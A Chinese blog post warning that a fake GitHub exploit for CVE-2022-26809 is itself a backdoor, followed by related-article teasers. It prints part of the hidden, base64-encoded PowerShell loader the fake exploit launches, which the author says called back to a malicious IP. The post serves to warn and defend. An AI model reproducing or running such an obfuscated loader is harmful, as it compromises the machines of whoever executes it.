警惕 CVE-2022-26809后门
今天突然之间就有好多小伙伴研究起了一个一个月前的CVE漏洞----CVE-2022-26809|远程代码执行漏洞;
文章地址: https://www.ddosi.org/cve-2022-26809-exp/
exp地址:
https://github.com/rkxxz/CVE-2022-26809
而后无数的群友一起去尝试,但是无一成功
本人也在虚拟机里面运行了一下,分别生成了x64以及x86的shellcode.bin文件
虚拟机运行所谓的exp
显示成功了,然是实际上并没有上线,而后继续实验,测试一台未开启445端口的win10虚拟机
而后就发现,出现了一个powershell的加密命令
powershell -nop -w hidden -encodedcommand "$s=New-Object
IO.MemoryStream(,[Convert]::FromBase64String(“H4sIAAAAAAAAAKVW+2/iSBL+efgrvFGkDUqCwRBCMlpp2gaDCW+DeUTRyY+2aWg/4m5jnNn5368MhFtm7vakOyTL7qLqq/qqq7tKx/xe5zGxeT90sHBv4JiRMBCkQuG6GWpc+EP49nvh2mQM+xbN8uVV4UvCSOAJesY49r9eLkuTJODExyUt4DgOIx3HO2JjBmqB6WMWmTYWSLDBNhe+F758iRKLEluwKbgQ3CSwD9Ivryo1PfYmnP7GQeILiNLQNjmEN80iLHwXlND3SR5ieV8pl8t3wgQzcIcPEgkkwo//hNX”
然后就有小伙子上线了
经查询,是一个恶意的ip地址
而后很多人开始石锤
哈哈哈,笑不活了,大家警惕此类文件,特别是exe结尾的所谓的exp,所示想实验,一定要在虚拟机里进行,做好快照,警惕钓鱼啊!
警惕 CVE-2022-26809后门相关推荐
- 警惕!Python 中少为人知的 10 个安全陷阱!
作者:Dennis Brinkrolf 译者:豌豆花下猫@Python猫 原题:10 Unknown Security Pitfalls for Python 英文:https://blog.sona ...
- Python 中少为人知的 10 个安全陷阱
作者:Dennis Brinkrolf 译者:豌豆花下猫@Python猫 原题:10 Unknown Security Pitfalls for Python 英文:https://blog.sona ...
- 警惕!国内某广告SDK内置“后门”功能,Google Play商店已强制下架
本文讲的是警惕!国内某广告SDK内置"后门"功能,Google Play商店已强制下架, 新闻摘要 Lookout安全团队近日发现了个信的广告软件开发工具包(SDK),可以通过下载 ...
- NeurIPS 2022 | 一种基于毒性样本敏感性的有效后门防御!
香港中文大学(深圳)和清华大学联合完成的后门防御工作被NeurIPS 2022接收为Spotlight论文.基于投毒的后门攻击对由不可信来源数据所训练的模型构成了严重威胁.给定一个后门模型,我们观察到 ...
- 七国要求科技巨头预留后门 应对马甲芯片高度警惕
日前,美国.英国.日本.澳大利亚.加拿大.新西兰.印度呼吁科技公司设计产品时确保政府可以访问经过加密的消息和内容. 其实,西方科技公司配合西方政府在产品中预留后门早已不是新鲜事,斯诺登就曾经爆料多个美 ...
- 警惕:新型蠕虫病毒通过可移动驱动器传播,并安装BLADABINDI后门
BLADABINDI,也被称为njRAT或Njw0rm,是一种远程访问木马(RAT),具有众多后门功能--从键盘记录到执行分布式拒绝服务(DDoS).自首次出现以来,该木马就已经在各种网络间谍活动中被 ...
- 万字长文:盘点2022全球10大数据泄漏事件(红蓝攻防角度)
导读:全球每年都会有大量的爆炸性的数据泄漏事件发生,但是今年的数据泄漏事件特别多,此起彼伏,而且数据泄漏的规模和造成的破坏性影响,一次比一次大. 根据Identify Theft Research C ...
- 2022 全球网络黑客常用攻击方法 Top10
近几年,借助互联网产业发展的东风,网络黑产也迎来更加巅峰的状态,不论是从攻击效率,组织规模,亦或是收益变现能力,都在一天天变的成熟完善.根据艾瑞咨询 2020 年发布的<现代网络诈骗分析报告&g ...
- 【重点警惕】.locked1后缀--TellYouThePass勒索病毒家族旗下勒索病毒
目录 前言:简介 一.什么是.locked1勒索病毒? 二.中了.locked1后缀勒索病毒文件怎么恢复? 三.系统安全防护措施建议: 前言:简介 近日,我们陆续有接到被".locked1& ...
最新文章
- SPRING3.X JSON 406 和 中文乱码问题
- 程序员的日常,过于真实 | 每日趣闻
- POJ-4004:数字组合(用位移方法解组合数问题,Java版)
- ASIHTTP 框架,同步、 异步请求、 上传 、 下载
- 来自ERP的product属性修改
- 面试金典--11.5
- android动画编辑软件,ALM视频动画编辑
- mysql严格模式 报错_mysql严格模式
- C#LeetCode刷题-几何
- oracle根据当前月份往前,oracle获取系统日期--当前时间+前一天+当前月+前一个月...
- 解决RecyclerView的onClickListener问题
- 用 JavaScript 实现内存位翻转漏洞
- .Net Core Pdf 转图片
- MySQL和php搭建聊天室,用PHP MySQL搭建聊天室
- 5个人审查5开源视频聊天工具
- Linux zip 7z效率比较,linux 下面的 7z和7za的区别
- 三维重建 几何方法 深度学习_三维重建算法综述|传统+深度学习方式
- 学生学籍信息管理系统设计c语言,c语言学籍信息管理系统设计
- au3打开html文件,[AU3]技巧 - 如何用AUTOIT打开网页
- ZEMAX | 如何使用 Jones Matrix 表面